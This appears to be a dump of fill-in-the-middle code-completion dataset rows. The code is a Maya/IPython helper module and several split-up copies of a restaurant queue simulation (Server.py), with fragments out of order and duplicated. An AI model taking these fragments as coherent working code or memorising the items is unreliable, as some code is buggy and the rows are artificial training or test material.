return source.node().listConnections(plugs=True, connections=True, source=True, destination=False, sourceFirst=True)
def getName(self, obj):
source, dest = obj
name = "%s -> %s" % (source, dest)
return name
def make_tree(self, root):
import pymel.core as pm
roots = pm.listConnections(root, plugs=True, connections=True, source=True, destination=False, sourceFirst=True)
return TreePager.make_tree(self, roots)
# formerly: magic_dghist
dg_parser = OptionParser()
dg_parser.add_option("-d", type="int", dest="maxdepth")
dg_parser.add_option("-t", action="store_false", dest="shapes", default=True)
dg_parser.add_option("-s", action="store_true", dest="shapes")
def dghist(self, parameter_s=''):
"""
"""
import pymel.core as pm
options, args = dg_parser.parse_args(parameter_s.split())
if not args:
print("must pass in nodes to display the history of")
return
colors = get_colors(self)
dgtree = DGHistoryTree(colors, options)
roots = [pm.PyNode(args[0])]
page(dgtree.make_tree(roots))
# formerly: magic_open
def openf(self, parameter_s=''):
"""Change the current working directory.
This command automatically maintains an internal list of directories
you visit during your IPython session, in the variable _sh. The
command %dhist shows this history nicely formatted. You can also
do 'cd -<tab>' to see directory history conveniently.
Usage:
openFile 'dir': changes to directory 'dir'.
openFile -: changes to the last visited directory.
openFile -<n>: changes to the n-th directory in the directory history.
openFile --foo: change to directory that matches 'foo' in history
openFile -b <bookmark_name>: jump to a bookmark set by %bookmark
(note: cd <bookmark_name> is enough if there is no
directory <bookmark_name>, but a bookmark with the name exists.)
'cd -b <tab>' allows you to tab-complete bookmark names.
Options:
-q: quiet. Do not print the working directory after the cd command is
executed. By default IPython's cd command does print this directory,
since the default prompts do not display path information.
Note that !cd doesn't work for this purpose because the shell where
!command runs is immediately discarded after executing 'command'."""
parameter_s = parameter_s.strip()
#bkms = self.shell.persist.get("bookmarks",{})
oldcwd = os.getcwd()
numcd = re.match(r'(-)(\d+)$', parameter_s)
# jump in directory history by number
if numcd:
nn = int(numcd.group(2))
try:
ps = ip.ev('_sh[%d]' % nn)
except IndexError:
print('The requested directory does not exist in history.')
return
else:
opts = {}
# elif parameter_s.startswith('--'):
# ps = None
# fallback = None
# pat = parameter_s[2:]
# dh = self.shell.user_ns['_sh']
# # first search only by basename (last component)
# for ent in reversed(dh):
# if pat in os.path.basename(ent) and os.path.isdir(ent):
# ps = ent
# break
#
# if fallback is None and pat in ent and os.path.isdir(ent):
# fallback = ent
#
# # if we have no last part match, pick the first full path match
# if ps is None:
# ps = fallback
#
# if ps is None:
# print "No matching entry in directory history"
# return
# else:
# opts = {}
else:
# turn all non-space-escaping backslashes to slashes,
# for c:\windows\directory\names\
parameter_s = re.sub(r'\\(?! )', '/', parameter_s)
opts, ps = self.parse_options(parameter_s, 'qb', mode='string')
# jump to previous
if ps == '-':
try:
ps = ip.ev('_sh[-2]' % nn)
except IndexError:
raise UsageError('%cd -: No previous directory to change to.')
# # jump to bookmark if needed
# else:
# if not os.path.exists(ps) or opts.has_key('b'):
# bkms = self.db.get('bookmarks', {})
#
# if bkms.has_key(ps):
# target = bkms[ps]
# print '(bookmark:%s) -> %s' % (ps,target)
# ps = target
# else:
# if opts.has_key('b'):
# raise UsageError("Bookmark '%s' not found. "
# "Use '%%bookmark -l' to see your bookmarks." % ps)
# at this point ps should point to the target dir
if ps:
ip.ex('openFile("%s", f=1)' % ps)
# try:
# os.chdir(os.path.expanduser(ps))
# if self.shell.rc.term_title:
# #print 'set term title:',self.shell.rc.term_title # dbg
# platutils.set_term_title('IPy ' + abbrev_cwd())
# except OSError:
# print sys.exc_info()[1]
# else:
# cwd = os.getcwd()
# dhist = self.shell.user_ns['_sh']
# if oldcwd != cwd:
# dhist.append(cwd)
# self.db['dhist'] = compress_dhist(dhist)[-100:]
# else:
# os.chdir(self.shell.home_dir)
# if self.shell.rc.term_title:
# platutils.set_term_title("IPy ~")
# cwd = os.getcwd()
# dhist = self.shell.user_ns['_sh']
#
# if oldcwd != cwd:
# dhist.append(cwd)
# self.db['dhist'] = compress_dhist(dhist)[-100:]
# if not 'q' in opts and self.shell.user_ns['_sh']:
# print self.shell.user_ns['_sh'][-1]
# maya sets a sigint / ctrl-c / KeyboardInterrupt handler that quits maya -
# want to override this to get "normal" python interpreter behavior, where it
# interrupts the current python command, but doesn't exit the interpreter
def ipymel_sigint_handler(signal, frame):
raise KeyboardInterrupt
def install_sigint_handler(force=False):
import signal
if force or signal.getsignal(signal.SIGINT) == ipymel_sigint_handler:
signal.signal(signal.SIGINT, ipymel_sigint_handler)
# unfortunately, it seems maya overrides the SIGINT hook whenever a plugin is
# loaded...
def | sigint_plugin_loaded_callback | identifier_name |
|
Server.py | (self.groups)
def isEmpty(self):
"""
Whether there is still group waiting
:return: True/False
"""
if len(self.groups) > 0:
return False
else:
return True
def add_queue(self, group):
"""
Add the newly come group into queue properly
:param group: the group watiing for entering into the queue
>>> g0=Group(12,2,False,0)
>>> q2=Queue() | >>> q2.groups[1].get_groupID() # Test whether vip would become the first
0
>>> g2=Group(20,2,False,2)
>>> q2.add_queue(g2)
>>> g3=Group(30,1,True,3)
>>> q2.add_queue(g3)
>>> q2.groups[0].get_groupID() # Test whether vip skip the queue properly
2
>>> q2.groups[1].get_groupID()
3
"""
if group.get_vip(): # If current group is a VIP group, move it forward by four groups,
enterQueue = False
if len(self.groups) >= 4:
for i in range(0, 4):
if self.groups[i].get_vip():
self.groups.insert(i, group)
enterQueue = True
break
if (enterQueue is False):
self.groups.insert(4, group)
elif len(self.groups) > 1 and len(self.groups) < 4:
for i in range(0, len(self.groups)):
if self.groups[i].get_vip():
self.groups.insert(i, group)
enterQueue = True
break
if (enterQueue is False):
self.groups.insert(1, group)
elif len(self.groups) <= 1:
self.groups.insert(0, group)
elif group.get_vip() is False:
self.groups.insert(0, group)
def del_queue(self): # delete last=delete first come group
"""
Pop the head (index = length of queue -1 ) of queue
:return: Object Group
"""
return self.groups.pop()
class Table:
def __init__(self, num, size):
self.num = num # No. of the table
self.size = size # Size of the table: for group of up to 2, 4 or 6.
self.currentGroup = None # Is the table occupied or not.
def busy(self):
if self.currentGroup != None:
return True
else:
return False
def startNext(self, newGroup):
self.currentGroup = newGroup
def cleanTable(self):
"""
When one group finish their meal, set their table's current group to none
"""
self.currentGroup = None
def get_num(self):
return self.num
class Group:
def __init__(self, time, size, vip, groupID):
self.timestamp = time # Time when group registered (entered into the queue)
self.size = size # randomly define size from 1 - 6
self.vip = vip # Whether the group is a vip group
self.table = None # Which table the group will be assigned to
# How long will the group spend on the table
if (size == 1) or (size == 2):
self.timeRequest = mod_pert_random(0, 40, 90, samples=1).astype(int)
elif (size == 3) or (size == 4):
self.timeRequest = mod_pert_random(45,75,120, samples=1).astype(int)
elif (size == 5) or (size == 6):
self.timeRequest = mod_pert_random(60,100,150, samples=1).astype(int)
self.groupID = groupID
def get_groupID(self):
return self.groupID
def get_stamp(self):
"""
Get the registration time of the group
:return: int, time point when the group came
"""
return self.timestamp
def get_size(self):
return self.size
def wait_time(self, current_time):
"""
Calculate the waiting time for the group
:param current_time: current time point
:return: waiting time for current group
>>> g0=Group(20,2,False,0)
>>> g0.wait_time(71)
51
"""
return current_time - self.timestamp
def get_vip(self):
return self.vip
def get_time_request(self):
return self.timeRequest
def tablesSetting(number_tables_2, number_tables_4, number_tables_6):
"""
Initialize tables
:param number_tables_2: number of tables for groups with one or two customers. (6)
:param number_tables_4: number of tables for groups with three or four customers. (4)
:param number_tables_6: number of tables for groups with five or six customers. (2)
:return: three lists, each for one type of tables, and the elements in every list are Table Objects.
>>> t2,t4,t6 = tablesSetting(6,4,2)
>>> len(t2)
6
>>> len(t4)
4
>>> len(t6)
2
"""
table_2_list = []
table_4_list = []
table_6_list = []
for i in range(number_tables_2):
table_2_list.append(Table(i, 2))
for i in range(number_tables_4):
table_4_list.append(Table(i + number_tables_2, 4))
for i in range(number_tables_6):
table_6_list.append(Table(i + number_tables_4 + number_tables_2, 6))
return (table_2_list, table_4_list, table_6_list)
def TableFinish(current_time, nextGroup_endTime, table_type):
"""
Clean the table when the group on it finished the meal
:param current_time: current time point
:param nextGroup_endTime: dict, {No. of the table: the ending time point, of the current group with it, for the table}
:param table_type: list, whose element is Table objects
:return None
"""
if (current_time in nextGroup_endTime.values()):
for n in list(nextGroup_endTime.keys()):
if current_time == int(nextGroup_endTime[n]):
if len(table_type)==6:
table_type[n].cleanTable()
elif len(table_type)==4:
table_type[n-6].cleanTable()
elif len(table_type)==2:
table_type[n-10].cleanTable()
def simulation(current_time, table, total_time, queue, total_timeR, nextGroup_endTime):
"""
Simulation at one specific time point (current_time)
:param current_time: time point, at which current simulation is running.
:param table: list, the elements in which are Table Objects.
:param queue: queue for groups
:param total_time: Duration
:param total_timeR: list, storing waiting time for each group served or is being served
:param nextGroup_endTime: dict, {No. of the table: the ending time point, of the current group with it, for the table}
"""
TableFinish(current_time, nextGroup_endTime, table)
for t in table:
if (t.busy() == False) and (not queue.isEmpty()):
nextGroup = queue.del_queue()
t.startNext(nextGroup)
print('Group No.', nextGroup.get_groupID(), 'will be assigned to Table', t.get_num(), '.\n', 'Their waiting time is',nextGroup.wait_time(current_time), 'minute(s).\n')
# Update the ending time for tables
nextGroup_endTime[t.get_num()] = current_time + nextGroup.get_time_request() + 2
total_timeR.append(int(nextGroup.get_time_request()) + 2)
# Simulation duartion is done, for groups who are not assigned
if current_time == total_time- 1:
at_least_waittime = []
for i in range(queue.queue_size()):
if len(nextGroup_endTime) > 0:
next_finish_time = min(nextGroup_endTime.values())
next_finish_table = min(nextGroup_endTime, key=nextGroup_endTime.get)
unpro_next = queue.del_queue()
print('Group', unpro_next.get_groupID(), 'needs to wait',
int(unpro_next.wait_time(next_finish_time)), 'minute(s) to be assigned.')
at_least_waittime.append(int(unpro_next.wait_time(next_finish_time)))
nextGroup_endTime.pop(next_finish_table)
else:
unpro_next = queue.del_queue()
print('There are still', i, 'Groups in front of Group No.',
unpro_next.get_groupID(), 'they need to wait at least', max(at_least_waittime),
'minute(s) to be assigned.' | >>> q2.add_queue(g0)
>>> len(q2.groups) # Test whether group is correctly added
1
>>> g1=Group(14,1,True,1)
>>> q2.add_queue(g1) | random_line_split |
Server.py | .groups)
def isEmpty(self):
"""
Whether there is still group waiting
:return: True/False
"""
if len(self.groups) > 0:
return False
else:
return True
def add_queue(self, group):
"""
Add the newly come group into queue properly
:param group: the group watiing for entering into the queue
>>> g0=Group(12,2,False,0)
>>> q2=Queue()
>>> q2.add_queue(g0)
>>> len(q2.groups) # Test whether group is correctly added
1
>>> g1=Group(14,1,True,1)
>>> q2.add_queue(g1)
>>> q2.groups[1].get_groupID() # Test whether vip would become the first
0
>>> g2=Group(20,2,False,2)
>>> q2.add_queue(g2)
>>> g3=Group(30,1,True,3)
>>> q2.add_queue(g3)
>>> q2.groups[0].get_groupID() # Test whether vip skip the queue properly
2
>>> q2.groups[1].get_groupID()
3
"""
if group.get_vip(): # If current group is a VIP group, move it forward by four groups,
enterQueue = False
if len(self.groups) >= 4:
for i in range(0, 4):
if self.groups[i].get_vip():
self.groups.insert(i, group)
enterQueue = True
break
if (enterQueue is False):
self.groups.insert(4, group)
elif len(self.groups) > 1 and len(self.groups) < 4:
for i in range(0, len(self.groups)):
if self.groups[i].get_vip():
self.groups.insert(i, group)
enterQueue = True
break
if (enterQueue is False):
|
elif len(self.groups) <= 1:
self.groups.insert(0, group)
elif group.get_vip() is False:
self.groups.insert(0, group)
def del_queue(self): # delete last=delete first come group
"""
Pop the head (index = length of queue -1 ) of queue
:return: Object Group
"""
return self.groups.pop()
class Table:
def __init__(self, num, size):
self.num = num # No. of the table
self.size = size # Size of the table: for group of up to 2, 4 or 6.
self.currentGroup = None # Is the table occupied or not.
def busy(self):
if self.currentGroup != None:
return True
else:
return False
def startNext(self, newGroup):
self.currentGroup = newGroup
def cleanTable(self):
"""
When one group finish their meal, set their table's current group to none
"""
self.currentGroup = None
def get_num(self):
return self.num
class Group:
def __init__(self, time, size, vip, groupID):
self.timestamp = time # Time when group registered (entered into the queue)
self.size = size # randomly define size from 1 - 6
self.vip = vip # Whether the group is a vip group
self.table = None # Which table the group will be assigned to
# How long will the group spend on the table
if (size == 1) or (size == 2):
self.timeRequest = mod_pert_random(0, 40, 90, samples=1).astype(int)
elif (size == 3) or (size == 4):
self.timeRequest = mod_pert_random(45,75,120, samples=1).astype(int)
elif (size == 5) or (size == 6):
self.timeRequest = mod_pert_random(60,100,150, samples=1).astype(int)
self.groupID = groupID
def get_groupID(self):
return self.groupID
def get_stamp(self):
"""
Get the registration time of the group
:return: int, time point when the group came
"""
return self.timestamp
def get_size(self):
return self.size
def wait_time(self, current_time):
"""
Calculate the waiting time for the group
:param current_time: current time point
:return: waiting time for current group
>>> g0=Group(20,2,False,0)
>>> g0.wait_time(71)
51
"""
return current_time - self.timestamp
def get_vip(self):
return self.vip
def get_time_request(self):
return self.timeRequest
def tablesSetting(number_tables_2, number_tables_4, number_tables_6):
"""
Initialize tables
:param number_tables_2: number of tables for groups with one or two customers. (6)
:param number_tables_4: number of tables for groups with three or four customers. (4)
:param number_tables_6: number of tables for groups with five or six customers. (2)
:return: three lists, each for one type of tables, and the elements in every list are Table Objects.
>>> t2,t4,t6 = tablesSetting(6,4,2)
>>> len(t2)
6
>>> len(t4)
4
>>> len(t6)
2
"""
table_2_list = []
table_4_list = []
table_6_list = []
for i in range(number_tables_2):
table_2_list.append(Table(i, 2))
for i in range(number_tables_4):
table_4_list.append(Table(i + number_tables_2, 4))
for i in range(number_tables_6):
table_6_list.append(Table(i + number_tables_4 + number_tables_2, 6))
return (table_2_list, table_4_list, table_6_list)
def TableFinish(current_time, nextGroup_endTime, table_type):
"""
Clean the table when the group on it finished the meal
:param current_time: current time point
:param nextGroup_endTime: dict, {No. of the table: the ending time point, of the current group with it, for the table}
:param table_type: list, whose element is Table objects
:return None
"""
if (current_time in nextGroup_endTime.values()):
for n in list(nextGroup_endTime.keys()):
if current_time == int(nextGroup_endTime[n]):
if len(table_type)==6:
table_type[n].cleanTable()
elif len(table_type)==4:
table_type[n-6].cleanTable()
elif len(table_type)==2:
table_type[n-10].cleanTable()
def simulation(current_time, table, total_time, queue, total_timeR, nextGroup_endTime):
"""
Simulation at one specific time point (current_time)
:param current_time: time point, at which current simulation is running.
:param table: list, the elements in which are Table Objects.
:param queue: queue for groups
:param total_time: Duration
:param total_timeR: list, storing waiting time for each group served or is being served
:param nextGroup_endTime: dict, {No. of the table: the ending time point, of the current group with it, for the table}
"""
TableFinish(current_time, nextGroup_endTime, table)
for t in table:
if (t.busy() == False) and (not queue.isEmpty()):
nextGroup = queue.del_queue()
t.startNext(nextGroup)
print('Group No.', nextGroup.get_groupID(), 'will be assigned to Table', t.get_num(), '.\n', 'Their waiting time is',nextGroup.wait_time(current_time), 'minute(s).\n')
# Update the ending time for tables
nextGroup_endTime[t.get_num()] = current_time + nextGroup.get_time_request() + 2
total_timeR.append(int(nextGroup.get_time_request()) + 2)
# Simulation duartion is done, for groups who are not assigned
if current_time == total_time- 1:
at_least_waittime = []
for i in range(queue.queue_size()):
if len(nextGroup_endTime) > 0:
next_finish_time = min(nextGroup_endTime.values())
next_finish_table = min(nextGroup_endTime, key=nextGroup_endTime.get)
unpro_next = queue.del_queue()
print('Group', unpro_next.get_groupID(), 'needs to wait',
int(unpro_next.wait_time(next_finish_time)), 'minute(s) to be assigned.')
at_least_waittime.append(int(unpro_next.wait_time(next_finish_time)))
nextGroup_endTime.pop(next_finish_table)
else:
unpro_next = queue.del_queue()
print('There are still', i, 'Groups in front of Group No.',
unpro_next.get_groupID(), 'they need to wait at least', max(at_least_waittime),
'minute(s) to be assigned.' | self.groups.insert(1, group) | conditional_block |
Server.py | (self.groups)
def isEmpty(self):
"""
Whether there is still group waiting
:return: True/False
"""
if len(self.groups) > 0:
return False
else:
return True
def add_queue(self, group):
"""
Add the newly come group into queue properly
:param group: the group watiing for entering into the queue
>>> g0=Group(12,2,False,0)
>>> q2=Queue()
>>> q2.add_queue(g0)
>>> len(q2.groups) # Test whether group is correctly added
1
>>> g1=Group(14,1,True,1)
>>> q2.add_queue(g1)
>>> q2.groups[1].get_groupID() # Test whether vip would become the first
0
>>> g2=Group(20,2,False,2)
>>> q2.add_queue(g2)
>>> g3=Group(30,1,True,3)
>>> q2.add_queue(g3)
>>> q2.groups[0].get_groupID() # Test whether vip skip the queue properly
2
>>> q2.groups[1].get_groupID()
3
"""
if group.get_vip(): # If current group is a VIP group, move it forward by four groups,
enterQueue = False
if len(self.groups) >= 4:
for i in range(0, 4):
if self.groups[i].get_vip():
self.groups.insert(i, group)
enterQueue = True
break
if (enterQueue is False):
self.groups.insert(4, group)
elif len(self.groups) > 1 and len(self.groups) < 4:
for i in range(0, len(self.groups)):
if self.groups[i].get_vip():
self.groups.insert(i, group)
enterQueue = True
break
if (enterQueue is False):
self.groups.insert(1, group)
elif len(self.groups) <= 1:
self.groups.insert(0, group)
elif group.get_vip() is False:
self.groups.insert(0, group)
def del_queue(self): # delete last=delete first come group
"""
Pop the head (index = length of queue -1 ) of queue
:return: Object Group
"""
return self.groups.pop()
class Table:
def __init__(self, num, size):
self.num = num # No. of the table
self.size = size # Size of the table: for group of up to 2, 4 or 6.
self.currentGroup = None # Is the table occupied or not.
def busy(self):
if self.currentGroup != None:
return True
else:
return False
def startNext(self, newGroup):
self.currentGroup = newGroup
def cleanTable(self):
"""
When one group finish their meal, set their table's current group to none
"""
self.currentGroup = None
def get_num(self):
return self.num
class Group:
def __init__(self, time, size, vip, groupID):
self.timestamp = time # Time when group registered (entered into the queue)
self.size = size # randomly define size from 1 - 6
self.vip = vip # Whether the group is a vip group
self.table = None # Which table the group will be assigned to
# How long will the group spend on the table
if (size == 1) or (size == 2):
self.timeRequest = mod_pert_random(0, 40, 90, samples=1).astype(int)
elif (size == 3) or (size == 4):
self.timeRequest = mod_pert_random(45,75,120, samples=1).astype(int)
elif (size == 5) or (size == 6):
self.timeRequest = mod_pert_random(60,100,150, samples=1).astype(int)
self.groupID = groupID
def get_groupID(self):
return self.groupID
def get_stamp(self):
"""
Get the registration time of the group
:return: int, time point when the group came
"""
return self.timestamp
def get_size(self):
return self.size
def wait_time(self, current_time):
|
def get_vip(self):
return self.vip
def get_time_request(self):
return self.timeRequest
def tablesSetting(number_tables_2, number_tables_4, number_tables_6):
"""
Initialize tables
:param number_tables_2: number of tables for groups with one or two customers. (6)
:param number_tables_4: number of tables for groups with three or four customers. (4)
:param number_tables_6: number of tables for groups with five or six customers. (2)
:return: three lists, each for one type of tables, and the elements in every list are Table Objects.
>>> t2,t4,t6 = tablesSetting(6,4,2)
>>> len(t2)
6
>>> len(t4)
4
>>> len(t6)
2
"""
table_2_list = []
table_4_list = []
table_6_list = []
for i in range(number_tables_2):
table_2_list.append(Table(i, 2))
for i in range(number_tables_4):
table_4_list.append(Table(i + number_tables_2, 4))
for i in range(number_tables_6):
table_6_list.append(Table(i + number_tables_4 + number_tables_2, 6))
return (table_2_list, table_4_list, table_6_list)
def TableFinish(current_time, nextGroup_endTime, table_type):
"""
Clean the table when the group on it finished the meal
:param current_time: current time point
:param nextGroup_endTime: dict, {No. of the table: the ending time point, of the current group with it, for the table}
:param table_type: list, whose element is Table objects
:return None
"""
if (current_time in nextGroup_endTime.values()):
for n in list(nextGroup_endTime.keys()):
if current_time == int(nextGroup_endTime[n]):
if len(table_type)==6:
table_type[n].cleanTable()
elif len(table_type)==4:
table_type[n-6].cleanTable()
elif len(table_type)==2:
table_type[n-10].cleanTable()
def simulation(current_time, table, total_time, queue, total_timeR, nextGroup_endTime):
"""
Simulation at one specific time point (current_time)
:param current_time: time point, at which current simulation is running.
:param table: list, the elements in which are Table Objects.
:param queue: queue for groups
:param total_time: Duration
:param total_timeR: list, storing waiting time for each group served or is being served
:param nextGroup_endTime: dict, {No. of the table: the ending time point, of the current group with it, for the table}
"""
TableFinish(current_time, nextGroup_endTime, table)
for t in table:
if (t.busy() == False) and (not queue.isEmpty()):
nextGroup = queue.del_queue()
t.startNext(nextGroup)
print('Group No.', nextGroup.get_groupID(), 'will be assigned to Table', t.get_num(), '.\n', 'Their waiting time is',nextGroup.wait_time(current_time), 'minute(s).\n')
# Update the ending time for tables
nextGroup_endTime[t.get_num()] = current_time + nextGroup.get_time_request() + 2
total_timeR.append(int(nextGroup.get_time_request()) + 2)
# Simulation duartion is done, for groups who are not assigned
if current_time == total_time- 1:
at_least_waittime = []
for i in range(queue.queue_size()):
if len(nextGroup_endTime) > 0:
next_finish_time = min(nextGroup_endTime.values())
next_finish_table = min(nextGroup_endTime, key=nextGroup_endTime.get)
unpro_next = queue.del_queue()
print('Group', unpro_next.get_groupID(), 'needs to wait',
int(unpro_next.wait_time(next_finish_time)), 'minute(s) to be assigned.')
at_least_waittime.append(int(unpro_next.wait_time(next_finish_time)))
nextGroup_endTime.pop(next_finish_table)
else:
unpro_next = queue.del_queue()
print('There are still', i, 'Groups in front of Group No.',
unpro_next.get_groupID(), 'they need to wait at least', max(at_least_waittime),
'minute(s) to be assigned.' | """
Calculate the waiting time for the group
:param current_time: current time point
:return: waiting time for current group
>>> g0=Group(20,2,False,0)
>>> g0.wait_time(71)
51
"""
return current_time - self.timestamp | identifier_body |
Server.py | .groups)
def isEmpty(self):
"""
Whether there is still group waiting
:return: True/False
"""
if len(self.groups) > 0:
return False
else:
return True
def | (self, group):
"""
Add the newly come group into queue properly
:param group: the group watiing for entering into the queue
>>> g0=Group(12,2,False,0)
>>> q2=Queue()
>>> q2.add_queue(g0)
>>> len(q2.groups) # Test whether group is correctly added
1
>>> g1=Group(14,1,True,1)
>>> q2.add_queue(g1)
>>> q2.groups[1].get_groupID() # Test whether vip would become the first
0
>>> g2=Group(20,2,False,2)
>>> q2.add_queue(g2)
>>> g3=Group(30,1,True,3)
>>> q2.add_queue(g3)
>>> q2.groups[0].get_groupID() # Test whether vip skip the queue properly
2
>>> q2.groups[1].get_groupID()
3
"""
if group.get_vip(): # If current group is a VIP group, move it forward by four groups,
enterQueue = False
if len(self.groups) >= 4:
for i in range(0, 4):
if self.groups[i].get_vip():
self.groups.insert(i, group)
enterQueue = True
break
if (enterQueue is False):
self.groups.insert(4, group)
elif len(self.groups) > 1 and len(self.groups) < 4:
for i in range(0, len(self.groups)):
if self.groups[i].get_vip():
self.groups.insert(i, group)
enterQueue = True
break
if (enterQueue is False):
self.groups.insert(1, group)
elif len(self.groups) <= 1:
self.groups.insert(0, group)
elif group.get_vip() is False:
self.groups.insert(0, group)
def del_queue(self): # delete last=delete first come group
"""
Pop the head (index = length of queue -1 ) of queue
:return: Object Group
"""
return self.groups.pop()
class Table:
def __init__(self, num, size):
self.num = num # No. of the table
self.size = size # Size of the table: for group of up to 2, 4 or 6.
self.currentGroup = None # Is the table occupied or not.
def busy(self):
if self.currentGroup != None:
return True
else:
return False
def startNext(self, newGroup):
self.currentGroup = newGroup
def cleanTable(self):
"""
When one group finish their meal, set their table's current group to none
"""
self.currentGroup = None
def get_num(self):
return self.num
class Group:
def __init__(self, time, size, vip, groupID):
self.timestamp = time # Time when group registered (entered into the queue)
self.size = size # randomly define size from 1 - 6
self.vip = vip # Whether the group is a vip group
self.table = None # Which table the group will be assigned to
# How long will the group spend on the table
if (size == 1) or (size == 2):
self.timeRequest = mod_pert_random(0, 40, 90, samples=1).astype(int)
elif (size == 3) or (size == 4):
self.timeRequest = mod_pert_random(45,75,120, samples=1).astype(int)
elif (size == 5) or (size == 6):
self.timeRequest = mod_pert_random(60,100,150, samples=1).astype(int)
self.groupID = groupID
def get_groupID(self):
return self.groupID
def get_stamp(self):
"""
Get the registration time of the group
:return: int, time point when the group came
"""
return self.timestamp
def get_size(self):
return self.size
def wait_time(self, current_time):
"""
Calculate the waiting time for the group
:param current_time: current time point
:return: waiting time for current group
>>> g0=Group(20,2,False,0)
>>> g0.wait_time(71)
51
"""
return current_time - self.timestamp
def get_vip(self):
return self.vip
def get_time_request(self):
return self.timeRequest
def tablesSetting(number_tables_2, number_tables_4, number_tables_6):
"""
Initialize tables
:param number_tables_2: number of tables for groups with one or two customers. (6)
:param number_tables_4: number of tables for groups with three or four customers. (4)
:param number_tables_6: number of tables for groups with five or six customers. (2)
:return: three lists, each for one type of tables, and the elements in every list are Table Objects.
>>> t2,t4,t6 = tablesSetting(6,4,2)
>>> len(t2)
6
>>> len(t4)
4
>>> len(t6)
2
"""
table_2_list = []
table_4_list = []
table_6_list = []
for i in range(number_tables_2):
table_2_list.append(Table(i, 2))
for i in range(number_tables_4):
table_4_list.append(Table(i + number_tables_2, 4))
for i in range(number_tables_6):
table_6_list.append(Table(i + number_tables_4 + number_tables_2, 6))
return (table_2_list, table_4_list, table_6_list)
def TableFinish(current_time, nextGroup_endTime, table_type):
"""
Clean the table when the group on it finished the meal
:param current_time: current time point
:param nextGroup_endTime: dict, {No. of the table: the ending time point, of the current group with it, for the table}
:param table_type: list, whose element is Table objects
:return None
"""
if (current_time in nextGroup_endTime.values()):
for n in list(nextGroup_endTime.keys()):
if current_time == int(nextGroup_endTime[n]):
if len(table_type)==6:
table_type[n].cleanTable()
elif len(table_type)==4:
table_type[n-6].cleanTable()
elif len(table_type)==2:
table_type[n-10].cleanTable()
def simulation(current_time, table, total_time, queue, total_timeR, nextGroup_endTime):
"""
Simulation at one specific time point (current_time)
:param current_time: time point, at which current simulation is running.
:param table: list, the elements in which are Table Objects.
:param queue: queue for groups
:param total_time: Duration
:param total_timeR: list, storing waiting time for each group served or is being served
:param nextGroup_endTime: dict, {No. of the table: the ending time point, of the current group with it, for the table}
"""
TableFinish(current_time, nextGroup_endTime, table)
for t in table:
if (t.busy() == False) and (not queue.isEmpty()):
nextGroup = queue.del_queue()
t.startNext(nextGroup)
print('Group No.', nextGroup.get_groupID(), 'will be assigned to Table', t.get_num(), '.\n', 'Their waiting time is',nextGroup.wait_time(current_time), 'minute(s).\n')
# Update the ending time for tables
nextGroup_endTime[t.get_num()] = current_time + nextGroup.get_time_request() + 2
total_timeR.append(int(nextGroup.get_time_request()) + 2)
# Simulation duartion is done, for groups who are not assigned
if current_time == total_time- 1:
at_least_waittime = []
for i in range(queue.queue_size()):
if len(nextGroup_endTime) > 0:
next_finish_time = min(nextGroup_endTime.values())
next_finish_table = min(nextGroup_endTime, key=nextGroup_endTime.get)
unpro_next = queue.del_queue()
print('Group', unpro_next.get_groupID(), 'needs to wait',
int(unpro_next.wait_time(next_finish_time)), 'minute(s) to be assigned.')
at_least_waittime.append(int(unpro_next.wait_time(next_finish_time)))
nextGroup_endTime.pop(next_finish_table)
else:
unpro_next = queue.del_queue()
print('There are still', i, 'Groups in front of Group No.',
unpro_next.get_groupID(), 'they need to wait at least', max(at_least_waittime),
'minute(s) to be assigned.' | add_queue | identifier_name |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.